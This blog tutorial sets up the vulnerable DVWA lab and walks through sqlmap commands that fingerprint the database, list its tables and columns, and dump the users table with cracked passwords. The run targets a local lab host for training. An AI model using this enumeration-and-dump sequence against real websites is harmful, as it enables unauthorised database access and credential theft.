Use sqlmap to detect a SQL injection vulnerability and retrieve a website's back-end user names and passwords

An LNMP environment needs to be set up in advance.

  • Install sqlmap (from the sqlmapproject release tarball)
[root@ localhost ~]# tar -xvzf sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz 
[root@ localhost ~]# cd sqlmapproject-sqlmap-7eab1bc/
[root@ localhost sqlmapproject-sqlmap-7eab1bc]# python sqlmap.py
  • Unzip DVWA-master into the web server's document root
[root@ localhost ~]# unzip DVWA-master.zip
[root@ localhost ~]# mv DVWA-master/* /var/www/html/
[root@ localhost ~]# chown apache:apache /var/www/html/ -R
[root@ localhost ~]# vim /var/www/html/config/config.inc.php.dist
 29 $_DVWA[ 'recaptcha_public_key' ]  = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
 30 $_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';

[root@ localhost ~]# mv /var/www/html/config/config.inc.php.dist /var/www/html/config.php
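  • Modify php.ini (DVWA's setup check expects allow_url_include to be On for its file-inclusion exercises; the setting permits remote file inclusion, so it belongs only on the lab host)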
[root@ localhost ~]# vim /etc/php.ini
 815 allow_url_include = On
  • Open the site in a browser, create the test database, and log in with user name admin (its password is "password", as the dump below shows)

  • Simulated attack (run against the local DVWA lab instance)
    Get database information
[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.1.63/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit"  --cookie="security=low; PHPSESSID=seodas3m78pp388d9p2l956k16" -b --current-db  --current-user
......
[16:38:18] [INFO] the back-end DBMS is MySQL
[16:38:18] [INFO] fetching banner
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
banner:    '5.5.64-MariaDB'
[16:38:18] [INFO] fetching current user
current user:    'root@localhost'
[16:38:18] [INFO] fetching current database
current database:    'dvwa'
[16:38:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.124.71'


[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.124.71/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=hnc9m48irt9e313sk9kt1lsgh4" -D dvwa --tables
......
[16:45:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[16:45:15] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+



[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.124.71/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=hnc9m48irt9e313sk9kt1lsgh4" -D dvwa -T users --columns
......
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0
[16:48:10] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+



[root@ localhost sqlmapproject-sqlmap-7eab1bc]# ./sqlmap.py -u "http://192.168.124.71/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie="security=low; PHPSESSID=hnc9m48irt9e313sk9kt1lsgh4" -D dvwa -T users -C user,password --dump
......
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

Common sqlmap parameters

-u: the target URL, including the parameter that is the SQL injection point
-b: retrieve the DBMS banner, which identifies the database type and version
-D: DBMS database to enumerate
-T: DBMS database table(s) to enumerate
-C: column(s) of the DBMS table to enumerate

--dump: dump DBMS data table entries
--cookie: cookie value for the current session
--current-db: get the current database
--current-user: get the user the application is currently connected to the database as

Tags: Database PHP MySQL Apache

Posted on Fri, 14 Feb 2020 06:39:42 -0800 by Valdoua